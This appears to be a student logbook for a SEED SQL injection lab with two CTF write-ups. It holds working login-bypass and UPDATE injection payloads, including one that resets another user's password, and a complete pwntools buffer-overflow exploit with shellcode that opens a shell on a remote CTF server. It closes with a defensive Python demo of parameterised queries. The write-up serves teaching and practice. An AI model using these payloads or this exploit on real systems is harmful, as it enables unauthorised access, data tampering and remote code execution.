# LOGBOOK 8

## TASK 1

In this task, we interact with the MySQL database through a shell in the docker container. We log in with `mysql -u root -pdees`, select the database (the server replies `Database changed`) and list the tables with `show tables;`:

![](https://i.imgur.com/KRM3h5m.png)

We then use the SQL query `SELECT * FROM credential WHERE name='alice';` to print Alice's information:

| ID | Name | EID | Salary | birth | SSN | PhoneNumber | Address | Email | NickName | Password |
|---|---|---|---|---|---|---|---|---|---|---|
| 1 | Alice | 10000 | 20000 | 9/20 | 10211002 | | | | | fdbe918bdae83000aa54747fc95fe0470fff4976 |

![](https://i.imgur.com/floX9CR.png)

## TASK 2.1

In order to log in as admin, we inject the following username: `admin'#` or `admin'--`. Taking into account this query:

![](https://i.imgur.com/btx5Qm5.png)

Our input closes the first quote of `'$input_uname'`, allowing us to write SQL code before the next quote begins. We then type `#` or `--` to comment out the rest of the line, thereby commenting out the password part of the query. Because of this we can type any password or simply leave it empty and the login will always be accepted.

![](https://i.imgur.com/TpA0Bmg.png)
![](https://i.imgur.com/XkOBP3w.png)

## TASK 2.2

Much like in task 2.1 we want to log in with the username `admin'#`, but this time through the terminal. To achieve this we use the curl command to make a request to the server. However, special characters must be URL-encoded, so we need to replace `'` with `%27` and `#` with `%23`. Our command looks like this: `curl 'www.seed-server.com/unsafe_home.php?username=admin%27%23'`. As a response we get the HTML document of the page with the credentials of all the employees.

![](https://i.imgur.com/NfiLf4J.png)

## TASK 2.3

To alter the database, we turn our input into two SQL queries. For this we would type, in the username input, something like this: `admin'; UPDATE credentials SET name='Hacked' WHERE name='alice'; #`.
This, however, doesn't work because in PHP's mysqli extension the mysqli::query() API doesn't allow multiple queries to run in the database server, as is written in the SQL Injection Attacks slides found [here](https://www.handsonsecurity.net/resources.html).

## TASK 3

### TASK 3.1

- By logging in as Alice we can see that her salary is 20000 at the start.

![](https://i.imgur.com/O2Vc6yl.png)

- By going to the edit profile page and analysing the code given:

```
$hashed_pwd = sha1($input_pwd);
$sql = "UPDATE credential SET
        nickname='$input_nickname',
        email='$input_email',
        address='$input_address',
        Password='$hashed_pwd',
        PhoneNumber='$input_phonenumber'
        WHERE ID=$id;";
$conn->query($sql);
```

- We noticed that we can change the salary by entering, for example, the following in one of the forms: `912345678', salary = '9999999' WHERE name='Alice'; #`. This completes the value of the chosen field (in this case the phone number), then appends the assignment that changes the salary and comments out the rest of the statement, so only this query is executed.

![](https://i.imgur.com/y6KKlEm.png)

- Going back to Alice's profile we can see that we indeed changed her salary.

![](https://i.imgur.com/nbXgIOQ.png)

### TASK 3.2

- Like we did in the last task, we can change the salary of the user Boby to $1 by entering the following in one of the forms: `912345678', salary = '1' WHERE name='Bob'; #`.

![](https://i.imgur.com/Q40anZa.png)

- This time, to check whether the query was successful, we logged in as admin and checked the User Details page, and confirmed that Boby's salary was indeed changed.

![](https://i.imgur.com/2fJJKFl.png)

### TASK 3.3

- Now we want to change Boby's password so we can log in to his account; we follow the same approach used previously to edit other fields.
- This time, however, since the password is saved as a SHA-1 hash of the entered data, we need to set the value to the SHA-1 of the password we want to use in the login.
- So in the phone number field we write the following: `912345678', password=sha1('1234') WHERE name='Boby'; #`.

![](https://i.imgur.com/FEJz0bo.png)

- Logging out of Alice's account and logging in to Boby's account with the new password 1234, we have access to his profile.

![](https://i.imgur.com/4hciGBq.png)

- As we can see in the image:

![](https://i.imgur.com/IVVaI0y.png)

# CTF challenge 1

By viewing the source code we realize the code is vulnerable in the following lines, because the input is not verified and the password is checked after the username within the same query, which allows us to perform an SQL injection.

```
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT username FROM user WHERE username = '".$username."' AND password = '".$password."'";
```

This situation is similar to the one we observed in task 2 of the lab, so we can apply the same strategy here. If we write `admin'--` in the username field and anything in the password field, we log in successfully: we enter the username we wish to log in as, close the string with the quote, and then write `--` to comment out the part of the query that verifies the password.

![](https://i.imgur.com/MWYJE05.png)

This way we log in and get the flag.

![](https://i.imgur.com/v17b9PO.png)

# CTF challenge 2

- By running checksec on the program we get the following output:

![](https://i.imgur.com/7SecaxP.png)

- There is no NX and there are no canaries, which means we can do a buffer overflow easily.
- PIE is enabled, so the program and its files are not always at the same memory position in every run.
- Analysing the code we verify that the vulnerability is in the line `gets(buffer);`, which allows us to do the buffer overflow.
- We can use the same file exploit-example.py from the other buffer overflow CTFs with some changes.
- By debugging the program with a breakpoint on the line pointed out we see that:

![](https://i.imgur.com/6P5AS5b.png)

- The buffer starts at 0xffffd010.
- The ebp is at 0xffffd078.
- Although the addresses change in every execution, the distance between them is always the same.
- So if we subtract the addresses the difference is 104 in decimal.
- By changing the python script used in week 5 to work with the remote server and to read the starting address, we get the following:

```
#!/usr/bin/python3
from pwn import *

p = remote('ctf-fsi.fe.up.pt', 4001)

# read address from output
buffer = p.recvuntil(b"input:")[43:43+11]
buffer = int(buffer, 16)

# Replace the content with the actual shellcode
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(500))

# Put the shellcode somewhere in the payload
start = 450                 # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = buffer + start        # Change this number
offset = 104 + 4            # Change this number

L = 4                       # Use 4
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')

p.sendline(content)
p.interactive()
```

Running this code gets us a shell on the host machine of `ctf-fsi.fe.up.pt`, port 4001. So we `cat flag.txt` and get the flag.

![](https://i.imgur.com/As04PX9.png)
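Returning to the SQL injection mechanics of Tasks 2 and 3: as an added example (not part of the logbook or of the SEED lab code), the following Python script reproduces the string-built login and edit-profile queries against a constructed in-memory SQLite table and places the parameterised versions beside them, showing that the `admin'--` and phone-number payloads above only work when the input is spliced into the SQL text, and that a stacked second statement is refused by the driver just as mysqli::query() refuses it in Task 2.3. Table contents, passwords and salaries are constructed; SQLite uses `--` rather than `#` for line comments.

```python
import sqlite3

# Constructed stand-in for the lab's `credential` table: in-memory SQLite, not the SEED MySQL database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (name TEXT, password TEXT, salary INTEGER, phonenumber TEXT)")
    conn.executemany("INSERT INTO credential VALUES (?, ?, ?, ?)",
                     [("admin", "seedadmin", 400000, ""), ("Alice", "seedalice", 20000, "")])
    return conn

def login_unsafe(conn, username, password):
    # As in unsafe_home.php the input is spliced into the SQL text: a quote ends the string
    # literal and `--` comments out the password check (Task 2.1).
    sql = f"SELECT name FROM credential WHERE name = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Prepared statement: values travel separately from the SQL text, so `'` and `--`
    # are ordinary characters of the username and match no row.
    sql = "SELECT name FROM credential WHERE name = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def update_phone_unsafe(conn, name, phone):   # same shape as the edit-profile UPDATE of Task 3
    conn.execute(f"UPDATE credential SET phonenumber = '{phone}' WHERE name = '{name}'")

def update_phone_safe(conn, name, phone):
    conn.execute("UPDATE credential SET phonenumber = ? WHERE name = ?", (phone, name))

def row(conn, name):   # (salary, phonenumber) of one user, to see what an update really did
    return conn.execute("SELECT salary, phonenumber FROM credential WHERE name = ?", (name,)).fetchone()

def stacked_query_refused(conn, username):
    # Task 2.3: like mysqli::query(), sqlite3's execute() runs a single statement and
    # rejects one appended after `;` (Python < 3.11 raises sqlite3.Warning instead).
    try:
        login_unsafe(conn, username, "x")
    except (sqlite3.Error, sqlite3.Warning):
        return True
    return False

def run_demo():
    bypass = "admin'--"                                                # Task 2.1 (SQLite has no `#` comment)
    raise_pay = "912345678', salary = 9999999 WHERE name = 'Alice'--"  # Task 3.1, typed into the phone field
    stacked = "admin'; UPDATE credential SET name='Hacked' WHERE name='Alice'; --"
    db = make_db()
    logins = (login_unsafe(db, bypass, "wrong"), login_safe(db, bypass, "wrong"))   # (True, False)
    update_phone_unsafe(db, "Alice", raise_pay)
    unsafe_row = row(db, "Alice")     # (9999999, '912345678'): salary rewritten
    db = make_db()
    update_phone_safe(db, "Alice", raise_pay)
    safe_row = row(db, "Alice")       # (20000, raise_pay): salary untouched, payload stored as phone text
    return logins + (unsafe_row, safe_row, stacked_query_refused(db, stacked))
```

Calling `run_demo()` returns the five results in the order given in the comments; the parameterised functions are the fix the lab's `unsafe_home.php` and edit-profile page lack.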